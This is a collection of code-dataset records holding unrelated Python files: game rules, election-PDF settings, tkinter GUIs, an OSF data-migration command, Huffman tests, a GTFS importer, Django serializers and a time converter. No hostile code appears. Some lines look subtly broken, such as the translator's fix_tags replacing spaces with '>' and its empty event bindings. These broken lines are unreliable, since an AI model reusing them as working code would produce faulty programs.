False)\nGame._add_rule_property('allow_change_vote', False)\nGame._add_rule_property('allow_multi_vote', False)\nGame._add_rule_property('proposal_count', 0)\nGame._add_rule_property('proposals', 
{})\nGame._add_rule_property('proposal_channel', None,\n getter_func=Game._try_get_channel,\n setter_func=lambda self, channel: channel.id)\nGame._add_rule_property('transaction_messages', [])\nGame._add_rule_property('transaction_channel', None,\n getter_func=Game._try_get_channel,\n setter_func=lambda self, channel: channel.id)\nGame._add_rule_property('currencies', {})\nGame._add_rule_property('player_last_seen', {})\nGame._add_rule_property('active_cutoff', 24 * 7)\n","sub_path":"nomic/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":16633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"439994158","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/coils/foundation/log.py\n# Compiled at: 2012-10-12 07:02:39\nimport logging, sys, types # 'types' is required by the types.InstanceType check below\nLEVELS = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, \n 'WARNING': logging.WARNING, \n 'ERROR': logging.ERROR, \n 'CRITICAL': logging.CRITICAL}\n\ndef getLogger(object):\n if isinstance(object, basestring):\n name = object\n if '/myapp/' in name:\n name = 'myapp/' + name.split('/myapp/')[1]\n name = name.replace('/', '.')\n elif type(object) is types.InstanceType:\n name = str(object.__class__)\n else:\n name = object.__class__.__module__ + '.' + object.__class__.__name__\n return logging.getLogger(name)","sub_path":"pycfiles/OpenGroupware-0.1.48-py2.6/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"246383959","text":"utah2014 = {\n 'year' : '2014',\n 'page_split_string' : 'Statement of Votes Cast',\n 'race_name_index' : 5,\n 'static_col_count' : 3, #reg. voters, total votes, times counted\n 'tworace_per_page_ranges' : [range(43,133)],\n 'ignore_pages' : [22,23,24,25,26,27,28],\n 'end_page' : 133,\n 'tworace_title_col_count' : {\n 'STATE SENATE D11' : 2,\n 'STATE SENATE D15' : 2,\n 'STATE REP D2' : 2,\n 'STATE REP D6' : 2,\n 'STATE REP D27' : 2,\n 'STATE REP D48' : 1,\n 'STATE REP D56' : 1,\n 'STATE REP D57' : 2,\n 'STATE REP D59' : 1,\n 'STATE REP D60' : 2,\n 'STATE REP D61' : 2,\n 'STATE REP D63' : 1,\n 'STATE REP D64' : 3,\n 'STATE REP D65' : 1,\n 'STATE REP D66' : 2,\n 'STATE REP D67' : 1,\n 'STATE REP D68' : 1,\n 'COUNTY COMM A' : 2,\n 'COUNTY COMM B' : 2,\n 'ASSESSOR' : 1,\n 'ATTORNEY' : 1,\n 'CLERK/AUDITOR' : 1,\n 'RECORDER' : 1,\n 'SHERIFF' : 2,\n 'SURVEYOR' : 1,\n 'TREASURER' : 1, \n }\n}\n\nutah2010 = {\n 'year' : '2010',\n 'page_split_string' : 'Statement of Votes Cast',\n 'race_name_index' : 6,\n 'static_col_count' : 2, #reg. voters, total votes \n 'tworace_per_page_ranges' : [range(101,106), range(131,141)],\n # 'ignore_pages' : [22,23,24,25,26,27,28],\n 'end_page' : 145,\n # on top of static cols use these\n 'tworace_title_col_count' : {\n 'STATE REP D65' : 1,\n 'STATE REP D66' : 1,\n 'COUNTY CLERK/AUDITOR' : 1, \n 'COUNTY RECORDER' : 1,\n 'COUNTY SURVEYOR' : 1,\n 'COUNTY SHERIFF' : 1,\n }\n}\n\nconfig = {\n 'year' : '2008',\n 'page_split_string' : 'Official Results',\n 'race_name_index' : 4,\n 'static_col_count' : 2, #reg. voters, total votes
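\n # note: static_col_count is the number of leading non-candidate columns; utah2014 has 3 (reg. voters, total votes, times counted)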
\n 'tworace_per_page_ranges' : [range(51,56)],\n # 'ignore_pages' : [22,23,24,25,26,27,28],\n 'end_page' : 140,\n # on top of static cols use these\n 'tworace_title_col_count' : {\n 'STATE REP D65' : 1,\n 'STATE REP D66' : 1,\n 'COUNTY CLERK/AUDITOR' : 1, \n 'COUNTY RECORDER' : 1,\n 'COUNTY SURVEYOR' : 1,\n 'COUNTY SHERIFF' : 1,\n }\n}","sub_path":"pdf_results_notypes/settings_pdf_no_vt.py","file_name":"settings_pdf_no_vt.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"566544794","text":"from tkinter import *\nfrom tkinter import filedialog # the star import does not pull in the dialog submodule\nroot = Tk()\nroot.title(\"제목 없음 - Windows 메모장\")\nroot.geometry(\"640x480+300+100\") # width x height + x offset + y offset\n\nfilename = ''\n\ndef open_file():\n global filename\n filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Open File\", filetypes=((\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")))\n if filename:\n with open(filename, 'r') as f:\n txt.delete('1.0', END)\n txt.insert('1.0', f.read())\n\ndef save_file():\n global filename\n if filename == '':\n filename = filedialog.asksaveasfilename(defaultextension=\".txt\", filetypes=((\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")))\n if filename:\n with open(filename, 'w') as f:\n f.write(txt.get('1.0', 'end'))\n\nmenu = Menu(root)\nmenu_file = Menu(menu, tearoff=0)\nmenu_file.add_command(label=\"Open File...\", command=open_file)\nmenu_file.add_command(label=\"Save\", command=save_file)\nmenu_file.add_separator()\nmenu_file.add_command(label=\"Exit\", command=root.quit)\nmenu.add_cascade(label=\"File\", menu=menu_file)\n\nscrollbar = Scrollbar()\nscrollbar.pack(side=\"right\", fill=\"y\")\n\ntxt = Text(root, width=640, height=480, yscrollcommand = scrollbar.set)\ntxt.pack()\n\nroot.config(menu=menu)\nroot.mainloop()","sub_path":"gui_basic/15_quiz.py","file_name":"15_quiz.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"353773142","text":"from tkinter import *\nfrom tkinter import scrolledtext\nfrom googletrans import Translator\n\ntranslator = Translator(service_urls=[\n 'translate.google.com',\n 'translate.google.co.kr',\n ])\n\ndef fix_tags(text):\n text = text.replace(' ', '>')\n return text\n\ndef translate(event=None):\n new_text = fix_tags(translator.translate([txt_original.get(1.0, END)], src=src_lang.get(), dest=dest_lang.get())[0].text)\n txt_translated.delete(1.0, END)\n txt_translated.insert(1.0, new_text)\n\nwindow = Tk()\nwindow.title(\"Content Translate\")\nwindow.geometry('600x500')\nwindow.bind('', translate)\n\nsrc_lang = StringVar()\ndest_lang = StringVar()\n\nsrc_ru = Radiobutton(text=\"RU\", variable=src_lang, value='ru')\nsrc_uk = Radiobutton(text=\"UK\", variable=src_lang, value='uk')\nsrc_en = Radiobutton(text=\"EN\", variable=src_lang, value='en')\nsrc_ru.place(relx=0.01, rely=0)\nsrc_uk.place(relx=0.21, rely=0)\nsrc_en.place(relx=0.41, rely=0)\nsrc_lang.set('ru')\n\ntxt_original = Text(window, width=50, height=12)\ntxt_original.place(relx=0.01, rely=0.05)\ntxt_original.bind('', translate)\n\nbtn = Button(window, text=\"translate\", bg='grey', fg='white', command=translate)\nbtn.place(relx=0.8, rely=0.05)\n\ndest_ru = Radiobutton(text=\"RU\", variable=dest_lang, value='ru')\ndest_uk = Radiobutton(text=\"UK\", variable=dest_lang, value='uk')\ndest_en = Radiobutton(text=\"EN\", variable=dest_lang, value='en')\ndest_ru.place(relx=0.01, rely=0.45)\ndest_uk.place(relx=0.21, rely=0.45)\ndest_en.place(relx=0.41, rely=0.45)\ndest_lang.set('uk')\n\ntxt_translated = Text(window, width=50, height=12)
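\n# output box: translate() clears this widget and inserts the converted text\ntxt_translated.place(relx=0.01, 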
rely=0.5)\n\nwindow.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"638588210","text":"import gc\nimport importlib\nimport sys\n\nimport ipdb\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom modularodm import Q as MQ\nfrom osf_models.models import ApiOAuth2Scope\nfrom osf_models.models import Guid\nfrom osf_models.models import NodeLog\nfrom osf_models.models import NotificationSubscription\nfrom osf_models.models import Tag\nfrom osf_models.models.base import GuidMixin\nfrom osf_models.models.contributor import AbstractBaseContributor\nfrom osf_models.utils.order_apps import get_ordered_models\n\nfrom framework.auth.core import User as MODMUser\nfrom framework.transactions.context import transaction as modm_transaction\nfrom website.files.models import StoredFileNode\nfrom website.models import Node as MODMNode\n\n\ndef make_guids(django_model, page_size=20000):\n print('Starting {} on {}...'.format(sys._getframe().f_code.co_name, django_model._meta.model.__name__))\n\n module_path, model_name = django_model.modm_model_path.rsplit('.', 1)\n modm_module = importlib.import_module(module_path)\n modm_model = getattr(modm_module, model_name)\n\n count = 0\n total = modm_model.find(django_model.modm_query).count()\n\n while count < total:\n with transaction.atomic():\n django_objects = list()\n offset = count\n limit = (count + page_size) if (count + page_size) < total else total\n\n page_of_modm_objects = modm_model.find(django_model.modm_query).sort('-_id')[offset:limit]\n\n for modm_obj in page_of_modm_objects:\n django_objects.append(Guid(**{django_model.primary_identifier_name: modm_obj._id}))\n count += 1\n if count % page_size == 0 or count == total:\n page_finish_time = timezone.now()\n print('Saving Guids for {} {} through {}...'.format(django_model._meta.model.__name__,\n count - page_size,\n count))\n saved = Guid.objects.bulk_create(django_objects)\n print('Done with {} {} in {} seconds...'.format(len(saved),\n django_model._meta.model.__name__, (\n timezone.now() - page_finish_time).total_seconds()))\n modm_obj._cache.clear()\n modm_obj._object_cache.clear()\n django_objects = []\n print('Took out {} trashes'.format(gc.collect()))\n total = None\n count = None\n print('Took out {} trashes'.format(gc.collect()))\n\n\ndef save_bare_models(modm_queryset, django_model, page_size=20000):\n print('Starting {} on {}...'.format(sys._getframe().f_code.co_name, django_model._meta.model.__name__))\n count = 0\n total = modm_queryset.count()\n hashes = set()\n\n while count < total:\n with transaction.atomic():\n django_objects = list()\n\n offset = count\n limit = (count + page_size) if (count + page_size) < total else total\n\n page_of_modm_objects = modm_queryset.sort('-_id')[offset:limit]\n\n for modm_obj in page_of_modm_objects:\n django_instance = django_model.migrate_from_modm(modm_obj)\n if django_instance._natural_key() is not None:\n # if there's a natural key\n if django_instance._natural_key() not in hashes:\n # and that natural key doesn't exist in hashes\n # add it to hashes and append the object\n hashes.add(django_instance._natural_key())\n django_objects.append(django_instance)\n else:\n # if _natural_key is None add it, it's probably pointing at .pk\n django_objects.append(django_instance)\n\n count += 1\n if count % page_size == 0 or count == 
total:\n page_finish_time = timezone.now()\n print('Saving {} {} through {}...'.format(django_model._meta.model.__name__, count - page_size,\n count))\n saved_django_objects = django_model.objects.bulk_create(django_objects)\n\n print('Done with {} {} in {} seconds...'.format(len(saved_django_objects),\n django_model._meta.model.__name__, (\n timezone.now() - page_finish_time).total_seconds()))\n modm_obj._cache.clear()\n modm_obj._object_cache.clear()\n saved_django_objects = []\n page_of_modm_objects = []\n print('Took out {} trashes'.format(gc.collect()))\n total = None\n count = None\n hashes = None\n print('Took out {} trashes'.format(gc.collect()))\n\n\ndef save_bare_system_tags(page_size=10000):\n print('Starting save_bare_system_tags...')\n start = timezone.now()\n\n things = list(MODMNode.find(MQ('system_tags', 'ne', [])).sort(\n '-_id')) + list(MODMUser.find(MQ('system_tags', 'ne', [])).sort(\n '-_id'))\n\n system_tag_ids = []\n for thing in things:\n for system_tag in thing.system_tags:\n system_tag_ids.append(system_tag)\n\n unique_system_tag_ids = set(system_tag_ids)\n\n total = len(unique_system_tag_ids)\n\n system_tags = []\n for system_tag_id in unique_system_tag_ids:\n system_tags.append(Tag(name=system_tag_id,\n system=True))\n\n created_system_tags = Tag.objects.bulk_create(system_tags)\n\n print('MODM System Tags: {}'.format(total))\n print('django system tags: {}'.format(Tag.objects.filter(system=True).count()))\n print('Done with {} in {} seconds...'.format(\n sys._getframe().f_code.co_name,\n (timezone.now() - start).total_seconds()))\n\n\ndef register_nonexistent_models_with_modm():\n \"\"\"\n There are guids refering to models that no longer exist.\n We can't delete the guids because then they could be regenerated.\n These models are registered so that anything at all will work.\n :return:\n \"\"\"\n\n class DropboxFile(StoredFileNode):\n pass\n\n class OSFStorageGuidFile(StoredFileNode):\n pass\n\n class OSFGuidFile(StoredFileNode):\n pass\n\n class GithubGuidFile(StoredFileNode):\n pass\n\n class NodeFile(StoredFileNode):\n pass\n\n class BoxFile(StoredFileNode):\n pass\n\n class FigShareGuidFile(StoredFileNode):\n pass\n\n class S3GuidFile(StoredFileNode):\n pass\n\n class DataverseFile(StoredFileNode):\n pass\n\n DataverseFile.register_collection()\n NodeFile.register_collection()\n S3GuidFile.register_collection()\n FigShareGuidFile.register_collection()\n BoxFile.register_collection()\n GithubGuidFile.register_collection()\n OSFStorageGuidFile.register_collection()\n OSFGuidFile.register_collection()\n DropboxFile.register_collection()\n\n@modm_transaction()\ndef merge_duplicate_users():\n print('Starting {}...'.format(sys._getframe().f_code.co_name))\n start = timezone.now()\n\n from framework.mongo.handlers import database\n\n duplicates = database.user.aggregate([\n {\n \"$group\": {\n \"_id\": \"$username\",\n \"ids\": {\"$addToSet\": \"$_id\"},\n \"count\": {\"$sum\": 1}\n }\n },\n {\n \"$match\": {\n \"count\": {\"$gt\": 1}\n }\n },\n {\n \"$sort\": {\n \"count\": -1\n }\n }\n ]).get('result')\n # [\n # {\n # 'count': 5,\n # '_id': 'duplicated@username.com',\n # 'ids': [\n # 'listo','fidst','hatma','tchth','euser','name!'\n # ]\n # }\n # ]\n print('Found {} duplicate usernames.'.format(len(duplicates)))\n for duplicate in duplicates:\n print('Found {} copies of {}'.format(len(duplicate.get('ids')), duplicate.get('_id')))\n if duplicate.get('_id'):\n # _id is an email address, merge users keeping the one that was logged into last\n users = 
list(MODMUser.find(MQ('_id', 'in', duplicate.get('ids'))).sort('-last_login'))\n best_match = users.pop()\n for user in users:\n print('Merging user {} into user {}'.format(user._id, best_match._id))\n best_match.merge_user(user)\n else:\n # _id is null, set all usernames to their guid\n users = MODMUser.find(MQ('_id', 'in', duplicate.get('ids')))\n for user in users:\n print('Setting username for {}'.format(user._id))\n user.username = user._id\n user.save()\n print('Done with {} in {} seconds...'.format(\n sys._getframe().f_code.co_name,\n (timezone.now() - start).total_seconds()))\n\n\nclass Command(BaseCommand):\n help = 'Migrates data from tokumx to postgres'\n\n def add_arguments(self, parser):\n parser.add_argument('--nodelogs', action='store_true', help='Run nodelog migrations')\n parser.add_argument('--nodelogsguids', action='store_true', help='Run nodelog guid migrations')\n\n\n def handle(self, *args, **options):\n # TODO Handle contributors, they're not a direct 1-to-1 they'll need some love\n\n # it's either this or catch the exception and put them in the blacklistguid table\n register_nonexistent_models_with_modm()\n\n models = get_ordered_models()\n # guids first, pls\n models.insert(0, models.pop(models.index(Guid)))\n\n if not options['nodelogs'] and not options['nodelogsguids']:\n merge_duplicate_users()\n # merged users get blank usernames, running it twice fixes it.\n merge_duplicate_users()\n\n for django_model in models:\n\n if not options['nodelogs'] and not options['nodelogsguids'] and django_model is NodeLog:\n continue\n elif (options['nodelogs'] or options['nodelogsguids']) and django_model is not NodeLog:\n continue\n\n if issubclass(django_model, AbstractBaseContributor) \\\n or django_model is ApiOAuth2Scope \\\n or not hasattr(django_model, 'modm_model_path'):\n continue\n\n module_path, model_name = django_model.modm_model_path.rsplit('.', 1)\n modm_module = importlib.import_module(module_path)\n modm_model = getattr(modm_module, model_name)\n modm_queryset = modm_model.find(django_model.modm_query)\n\n with ipdb.launch_ipdb_on_exception():\n if hasattr(django_model, 'primary_identifier_name') and \\\n not issubclass(django_model, GuidMixin) and \\\n django_model is not NotificationSubscription:\n if not options['nodelogs']:\n make_guids(django_model, page_size=django_model.migration_page_size)\n if not options['nodelogsguids']:\n save_bare_models(modm_queryset, django_model, page_size=django_model.migration_page_size)\n modm_model._cache.clear()\n modm_model._object_cache.clear()\n print('Took out {} trashes'.format(gc.collect()))\n\n # Handle system tags, they're on nodes, they need a special migration\n if not options['nodelogs'] and not options['nodelogsguids']:\n save_bare_system_tags()\n","sub_path":"osf_models/management/commands/migratedata.py","file_name":"migratedata.py","file_ext":"py","file_size_in_byte":11750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351479302","text":"import unittest\nimport filecmp\nfrom huffman_coding import cnt_freq, create_huff_tree, create_code, huffman_encode\nfrom huffman import HuffmanNode\n\nclass TestList(unittest.TestCase):\n\n def test_huffnode_eq_repr(self):\n huff1 = HuffmanNode('c', 5, None, None)\n huff2 = HuffmanNode('d', 5, None, None)\n self.assertNotEqual(huff1, huff2)\n huff2.char = 'c'\n self.assertEqual(huff1, huff2)\n self.assertEqual(repr(huff1), \"HuffmanNode(c, 5, None, None)\")\n\n def test_cnt_freq(self):\n freqlist\t= 
cnt_freq(\"file1.txt\")\n anslist = [0]*256\n anslist[97:104] = [2, 4, 8, 16, 0, 2, 0]\n self.assertListEqual(freqlist[97:104], anslist[97:104])\n\n def test_create_huff_tree(self):\n freqlist = cnt_freq(\"file1.txt\")\n hufftree = create_huff_tree(freqlist)\n numchars = 32\n charforroot = \"a\"\n self.assertEqual(hufftree.freq, 33)\n self.assertEqual(hufftree.left.char, 'd')\n left = hufftree.left\n self.assertEqual(left.freq, 16)\n self.assertEqual(left.char, 'd')\n right = hufftree.right\n self.assertEqual(right.freq, 17)\n self.assertEqual(ord(right.char), 0)\n\n def test_create_code(self):\n freqlist = cnt_freq(\"file1.txt\")\n hufftree = create_huff_tree(freqlist)\n codes = create_code(hufftree)\n print('d', codes[ord('d')])\n print('a', codes[ord('a')])\n print('f', codes[ord('f')])\n self.assertEqual(codes[ord('d')], '0')\n self.assertEqual(codes[ord('a')], '11111')\n self.assertEqual(codes[ord('f')], '1110')\n\n def test_create_code2(self):\n freqlist = cnt_freq(\"file2.txt\")\n hufftree = create_huff_tree(freqlist)\n codes = create_code(hufftree)\n print('g', codes[ord('g')])\n print('o', codes[ord('o')])\n print(' ', codes[ord(' ')])\n self.assertEqual(codes[ord('g')], '00')\n self.assertEqual(codes[ord('o')], '01')\n self.assertEqual(codes[ord(' ')], '101')\n\n def test_create_code3(self):\n print(\"TEST #3\")\n freqlist = cnt_freq(\"file3.txt\")\n hufftree = create_huff_tree(freqlist)\n codes = create_code(hufftree)\n print('s', codes[ord('s')])\n print('t', codes[ord('t')])\n print('r', codes[ord('r')])\n print('e', codes[ord('e')])\n print('a', codes[ord('a')])\n print('o', codes[ord('o')])\n print('n', codes[ord('n')])\n print(' ', codes[ord(' ')])\n self.assertEqual(codes[ord('s')], '111')\n self.assertEqual(codes[ord('t')], '00')\n self.assertEqual(codes[ord('a')], '010')\n\n def test_empty(self):\n self.assertRaises(FileNotFoundError, huffman_encode,\n \"does_not_exist.txt\", \"dne_encode.txt\")\n huffman_encode(\"empty.txt\", \"empty_encode.txt\")\n self.assertTrue(filecmp.cmp(\"empty_encode.txt\", \"empty.txt\"))\n\n def test_00(self):\n huffman_encode(\"file0.txt\", \"encodetest0.txt\")\n self.assertTrue(filecmp.cmp(\"encodetest0.txt\", \"file0_soln.txt\"))\n\n\n def test_01_encodefile(self):\n huffman_encode(\"file1.txt\", \"encodetest1.txt\")\n # capture errors by running 'filecmp' on your encoded file\n # with a *known* solution file\n self.assertTrue(filecmp.cmp(\"encodetest1.txt\", \"file1_soln.txt\"))\n\n def test_02_encodefile(self):\n huffman_encode(\"file2.txt\", \"encodetest2.txt\")\n # capture errors by running 'filecmp' on your encoded file\n # with a *known* solution file\n self.assertTrue(filecmp.cmp(\"encodetest2.txt\", \"file2_soln.txt\"))\n\n def test_03_encodefile(self):\n huffman_encode(\"file3.txt\", \"encodetest3.txt\")\n # capture errors by running 'filecmp' on your encoded file\n # with a *known* solution file\n self.assertTrue(filecmp.cmp(\"encodetest3.txt\", \"file3_soln.txt\"))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"huffman_coding/huffman_tests_a.py","file_name":"huffman_tests_a.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434919859","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndatas = pd.read_csv('bj_liuhuan_wkt.csv',skiprows = 1,names=['grid','points'])\nn = len(datas)\n#print(datas['grid'])\n\n'''\n# 简单看下网格的样子\nfig = plt.figure(1)\nprint(datas['points'][0])\nfor i in 
range(len(datas)):\n data = datas['points'][i]\n # print(data)\n xs = []\n ys = []\n loc = data.find('(')\n xs.append(int(data[loc + 3:loc + 9]))\n ys.append(int(data[loc + 22:loc + 29]))\n data = data[loc + 42:]\n for i in range(3):\n xs.append(int(data[:6]))\n ys.append(int(data[19:26]))\n data = data[39:]\n\n plt.scatter(xs, ys,marker='.',s=2)\nplt.show(fig)\n'''\n\n# Found a simpler coordinate pattern, e.g. (433943.69714851433 4393540.4441694766), and only take the top-left corner of each grid cell\nxs=[]; ys=[]\nfor i in range(len(datas)):\n data = datas['points'][i] # DataFrame is indexed column-first, then row\n # print(data)\n loc = data.find('(')\n xs.append(int(data[loc + 4:loc + 6]))\n ys.append(int(data[loc + 23:loc + 26]))\nxs=pd.Series(xs); ys=pd.Series(ys)\nxs = xs-xs.min()\nys = ys-ys.min()\n\nfig = plt.figure(1)\nplt.scatter(xs,ys,marker='.',s=3)\nplt.show(fig)\n\n'''\n# Map each grid id to its position (row/column) in a 2D matrix\nxordi = xs.max()+1 # number of columns\nyordi = ys.max()+1 # number of rows\ngrid2loc = pd.DataFrame(np.zeros((n,2),np.int8),index = datas['grid']) # dict-like form: id -> coordinates\nloc2grid = pd.DataFrame(np.zeros((yordi,xordi),np.int16)) # 2D-matrix form: coordinates -> id\nfor i in range(n):\n gridnumber = datas['grid'][i]\n point = (xs[i],ys[i])\n grid2loc.iat[i,0] = xs[i]\n grid2loc.iat[i,1] = ys[i]\n loc2grid.iat[ys[i],xs[i]] = gridnumber\n# save as csv\ngrid2loc.to_csv('grid2loc.csv',index_label= 'stationID',header=['x_cor','y_cor'])\nloc2grid.to_csv('loc2grid.csv')\n#print(grid2loc)\n#print(loc2grid)\n'''\n\n\n","sub_path":"Code/Preprocessor/Grids_processing/gridindex.py","file_name":"gridindex.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"446772141","text":"'''\nCreated on Jan 22, 2012\n\n@author: sanjits\n'''\n\nimport csv\nfrom gtfs.models import Agency\nfrom gtfsimporterutils import csvValueOrNone\nfrom importer_base import CSVImporterBase\n\nclass AgencyImporter(CSVImporterBase):\n '''\n Import the agencies from agency.txt\n '''\n\n def __init__(self, filename, source, logger):\n '''\n Constructor.\n @param filename: file name to import (full path to agency.txt)\n @param source: source of importer\n @param logger: logger\n '''\n super(AgencyImporter, self).__init__()\n self.filename = filename\n self.source = source\n self.logger = logger\n assert self.source is not None\n \n def parse(self):\n '''\n Parse the agency.txt csv file creating an Agency\n record per csv record\n '''\n # Delete existing entries\n agenciesToDelete = Agency.objects.filter(source=self.source)\n self.logger.debug('Cleaning existing Agencies %s', agenciesToDelete)\n agenciesToDelete.delete()\n \n # Iterate over all entries\n reader = csv.DictReader(open(self.filename, 'r'), skipinitialspace=True)\n agency = None\n for row in reader:\n #Parse row\n self.logger.info('Parsing agency row: %s', row)\n agencyId = csvValueOrNone(row, 'agency_id')\n agency = Agency()\n agency.source = self.source\n agency.agencyId = agencyId\n agency.agencyName = row['agency_name']\n agency.agencyUrl = row['agency_url']\n agency.agencyTimezone = row['agency_timezone']\n agency.agencyLang = csvValueOrNone(row, 'agency_lang')\n agency.agencyPhone = csvValueOrNone(row, 'agency_phone')\n agency.agencyFareUrl = csvValueOrNone(row, 'agency_fare_url')\n agency.save()\n \n return agency","sub_path":"agency_importer.py","file_name":"agency_importer.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"427578166","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n
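# parse the Taipei city-owned land list workbook and insert normalized parcel records into the land database\nfrom openpyxl import 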
Workbook\nfrom openpyxl import load_workbook\nimport math\nimport landdata\n\ndef parse_LandTaipeiList(landparser):\n FILENAME = \"../OtherDatas/LandTaipeiList-20150529.xlsx\"\n inwb = load_workbook(FILENAME)\n data = {}\n for sheetName in inwb.get_sheet_names():\n sheet = inwb[sheetName]\n print(sheetName, type(sheet), sheet)\n# print(sheet.rows)\n# print(sheet.rows)\n# print(sheet.rows[:2])\n for row in sheet.rows:\n if row[0].value.find('臺北市市有土地清冊') >= 0 or row[0].value.find('管理機關') >= 0:\n continue\n# print(row[0].value)\n rowdata = [ r.value for r in row ]\n pl = landparser.parseland(rowdata[1]+\"地號\")\n# print(rowdata, pl)\n if not pl:\n continue\n if pl[0] in data.keys():\n# print(\"dup:\", data[pl[0]][0], rowdata)\n if data[pl[0]][0][0] == rowdata[0]:\n data[pl[0]][0][3] += rowdata[3]\n else:\n data[pl[0]][2] += 1\n else:\n data[pl[0]] = [rowdata, pl, 0]\n print('---------------------------')\n# break\n# for k, v in data.items():\n# if v[2] != 0:\n# print(v)\n# print('---------------------------')\n noeq = 0\n eq = 0\n insert = []\n for k, v in data.items():\n if v[2] == 0 and v[0][2] >= v[0][3]:\n if v[0][2] != v[0][3]:\n noeq += 1\n# print(v[0][2], v[0][3], ' >> ', int(math.ceil(v[0][2])), int(math.ceil(v[0][3])))\n numerator = int(math.ceil(v[0][3]))\n denominator = int(math.ceil(v[0][2]))\n else:\n eq += 1\n numerator = 1\n denominator = 1\n if numerator > denominator:\n raise ValueError('numerator exceeds denominator') # raising a plain string is invalid in Python 3\n insert.append([4] + v[1] + [v[0][2], numerator, denominator, '臺北市'+v[0][0]])\n print(\"noeq=%d eq=%d\" % (noeq, eq))\n with landdata.LandStorage() as db:\n db.insert_excel_datas_0(insert)\n# for i in insert:\n# print(i)\n\nif __name__ == \"__main__\":\n print('Excel parser!')\n import sys\n sys.path.insert(0, '../')\n import parser\n _LANDNAME_DB_PATH = '../LandName/landnames.sqlite'\n parser = parser.LandParser(_LANDNAME_DB_PATH)\n parse_LandTaipeiList(parser)\n print(\"--END--\")\n\n\n","sub_path":"FNPCrawler/parser_excel.py","file_name":"parser_excel.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"86776760","text":"from rest_framework import serializers\nfrom .models import User\nfrom django.contrib.auth.models import Group\n\nclass UserSerializer(serializers.ModelSerializer):\n\n groups = serializers.SlugRelatedField(\n queryset=Group.objects.all(),\n slug_field=\"name\",\n required=True,\n many=True\n )\n class Meta:\n model = User\n fields = (\"id\", \"username\", \"first_name\", \"last_name\",\"groups\")\n read_only_fields = (\"username\",)\n\n\nclass UserGroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = [\"name\",\"permissions\"]\n\n\n\nclass CreateUserSerializer(serializers.ModelSerializer):\n groups = serializers.SlugRelatedField(\n queryset=Group.objects.all(),\n slug_field=\"name\",\n required=True,\n many=True\n )\n\n\n\n def create(self, validated_data):\n # call create_user on user object. Without this\n # the password will be stored in plain text.\n groups = validated_data.pop(\"groups\", [])\n user = User.objects.create_user(**validated_data)\n if groups:\n user.groups.clear()\n user.groups.add(*groups)\n user.save()\n return user\n
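\n # groups arrive as names via the SlugRelatedField; when supplied, clear()+add() replaces membership to match the payload exactly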
\n def update(self, instance, validated_data):\n # unlike create(), a plain setattr would store the password in plain text, so pop it and hash it via set_password\n groups = validated_data.pop(\"groups\", [])\n password = validated_data.pop(\"password\", None)\n\n for name, value in validated_data.items():\n setattr(instance, name, value)\n if password:\n instance.set_password(password)\n instance.save()\n\n if groups:\n instance.groups.clear()\n instance.groups.add(*groups)\n instance.save()\n return instance\n\n\n\n\n class Meta:\n model = User\n fields = (\n \"id\",\n \"username\",\n \"password\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"auth_token\",\n \"groups\"\n )\n read_only_fields = (\"auth_token\",)\n extra_kwargs = {\"password\": {\"write_only\": True}}\n\n\n###############################################################################################\n# Elastic Serializer\n###############################################################################################\n\n\nclass UserElasticSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\"id\", \"first_name\", \"last_name\",\"username\")\n read_only_fields = (\"username\",)\n","sub_path":"backend/pkdb_app/users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"10803883","text":"import os\nimport sys\n\n\n#\n# Complete the timeConversion function below.\n#\ndef timeConversion(s):\n #\n minutes = s[3:5]\n seconds = s[6:8]\n AMPM = s[8:]\n Inthours = int(s[0:2])\n\n if AMPM == 'AM' and Inthours in range(1, 10): # pad only single-digit hours; 10 and 11 need no leading zero\n Inthours = (\"0\" + str(Inthours))\n elif AMPM == 'AM' and Inthours == 12:\n Inthours = \"00\"\n elif AMPM == 'PM' and Inthours != 12:\n Inthours += 12\n\n hours = str(Inthours)\n militaryTime = (hours + \":\" + minutes + \":\" + seconds)\n return militaryTime
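\n\n# illustrative checks: timeConversion(\"07:05:45PM\") -> \"19:05:45\"; timeConversion(\"12:00:00AM\") -> \"00:00:00\"; timeConversion(\"10:15:00AM\") -> \"10:15:00\"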
